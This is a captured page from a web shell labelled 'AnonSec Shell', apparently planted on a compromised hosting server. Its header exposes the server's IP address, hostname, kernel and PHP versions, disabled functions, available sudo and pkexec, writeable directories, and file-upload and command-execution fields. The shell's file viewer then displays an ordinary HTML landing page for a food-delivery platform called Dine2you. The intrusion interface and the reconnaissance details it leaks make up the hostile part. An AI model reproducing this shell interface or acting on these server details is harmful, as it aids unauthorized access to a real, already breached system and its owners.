AnonSec Shell
Server IP : 162.214.74.102  /  Your IP : 216.73.217.80
Web Server : Apache
System : Linux dedi-4363141.lrsys.com.br 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64
User : lrsys ( 1015)
PHP Version : 5.6.40
Disable Function : exec,passthru,shell_exec,system
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/lrsys/public_html/lrsys_projetos/sopizzas/application/views/frontend/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/lrsys/public_html/lrsys_projetos/sopizzas/application/views/frontend/home.html
<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="UTF-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta name="viewport" content="width=device-width, initial-scale=1.0,maximum-scale=1">
		
		<title>Dine2you - An online food ordering system for local restaurants</title>
		<!-- Styles -->
		  <link rel="stylesheet" href="assets/css/font-awesome.min.css">
		  <link rel="stylesheet" href="assets/css/animate.css">
		  <link href='http://fonts.googleapis.com/css?family=Raleway:400,100,200,300,500,600,700,800,900|Montserrat:400,700' rel='stylesheet' type='text/css'>
		  

		  <link rel="stylesheet" href="assets/css/bootstrap.min.css">
		  <link rel="stylesheet" href="assets/css/front-end/main.css">
		  <link rel="stylesheet" href="assets/css/front-end/style2.css">
		
		<!--[if lt IE 9]>
		<script src="js/ie-support/html5.js"></script>
		<script src="js/ie-support/respond.js"></script>
		<![endif]-->

	</head>


	<body class="homepage">
		
		<div id="site-content">

			<header class="site-header">
				<div class="container">
					<div id="branding">
						<img src="logo-hp1.png" alt="" class="logo">
					</div>
				</div>
			</header> <!-- .site-header -->

			<main class="main-content">
				<div class="hero">
					<div class="hero-half-background1" style="background-image: url('assets/img/front-end/home.jpg');"></div>
					<div class="hero-half-background2" style="background-image: url('assets/img/front-end/driver-front.jpg');"></div>
					<div class="hero-half-background3"></div>
						<div class="row">
							<div class="col-md-12">
								<div class="col-md-6">
									<h1>Hey, restaurant owners!<br>Hungry for more business?</h1>
									<p class="text-center">Packed with features to drive your sales.</p>
									<div class="col-md-12 custom-padding-0 mt20">
										<div class="col-md-4 text-center">
											<img src="assets/img/front-end/control-panel.png">
											<h4>Simple Control Panel</h4>
											<p>We believe that managing your online store should be simple. With our easy-to-use control panel.</p>
										</div>
										<div class="col-md-4 text-center">
											<img src="assets/img/front-end/mobile-oerating.png">
											<h4>Mobile Ordering</h4>
											<p>Put your menu into the hands of your customers. Let your customers easily order from any mobile device.</p>
										</div>
										<div class="col-md-4 text-center">
											<img src="assets/img/front-end/icon-delivery.png">
											<h4>Easy Delivery</h4>
											<p>You relax, we deliver. Our delivery personnel carry one order at a time which ensures we get reliable and fast deliveries to your customers.</p>
										</div>
									</div>
									<div class="col-md-12"> 
										<button type="button" onclick="window.location.href = 'restaurant-business.html'" class="search-btn1 col-xs-12 mt30">Read More & Signup</button>
									</div>
								</div>
								<div class="col-md-6">
									<h1>Dine2You for Drivers: Drive with us.</h1>
									<p class="text-center">Deliver great food to homes and offices everywhere. Flexible shifts and competitive pay.</p>
									<div class="col-md-12 custom-padding-0 mt50">
										<div class="col-md-4 text-center">
											<img src="assets/img/front-end/icon_workwhen.png">
											<h4>Work on your schedule</h4>
											<p>Take trips for a few hours in the afternoons, every night, or just on weekends—it's up to you. You are your own boss and you can choose when and how much you work.</p>
										</div>
										<div class="col-md-4 text-center">
											<img src="assets/img/front-end/icon_chooseride.png">
											<h4>Drive your car</h4>
											<p>Turn your car into a money making machine. Add valid license, registration, and insurance. Just make sure it’s ready for the road, and we'll guide you through the rest.</p>
										</div>
										<div class="col-md-4 text-center">
											<img src="assets/img/front-end/icon_getpaid.png">
											<h4>Earn good money</h4>
											<p>You'll make money by bringing people the things they love. Between deliveries, it's just you. So bump your favorite tunes and enjoy cruising around your city.</p>
										</div>
									</div>
									<div class="col-md-12"> 
										<button type="button" onclick="window.location.href = 'drivers-splash.html';" class="search-btn1 col-xs-12 mt8">Read More & Signup</button>
									</div>
								</div>
							</div>
						</div> <!-- .row -->
				</div> <!-- .hero -->
			</main> <!-- .main-content -->

		</div> <!-- #site-content -->

		<script src="assets/plugins/jQuery/jQuery-2.1.4.min.js"></script>
	    <script>window.jQuery || document.write('<script src="js/jquery-1.11.0.min.js"><\/script>')</script>
	    <script src="assets/js/wow.min.js"></script>
	    <script src="assets/js/bootstrap.min.js"></script> 

	    <script type="text/javascript">
	    	$(function() {
	    		var winHeight = $(window).height();
	    		var winWidth = $(window).width();
	    		//alert(winHeight);
	    		var headerHeight = $('.site-header').height();
	    		var contentHeight = $('.main-content').height();
	    		var bottomSpace = winHeight - (headerHeight + contentHeight);
	    		var newHeight = winHeight - headerHeight;
	    		//alert(newHeight);
	    		if (winWidth > 0) {
	    			$('.hero').css({'height':newHeight});
	    			$('#site-content').css({'height':winHeight, 'overflow-x':'hidden', 'max-height':winHeight});
	    		}

	    	})
	    </script>

	    <style type="text/css">
	    #site-content {
	    	position: relative;
	    	top: 0;
	    	right: 0;
	    	bottom: 0;
	    	left: 0;
	    }
	    </style>
		
	</body>

</html>

Anon7 - 2022
AnonSec Team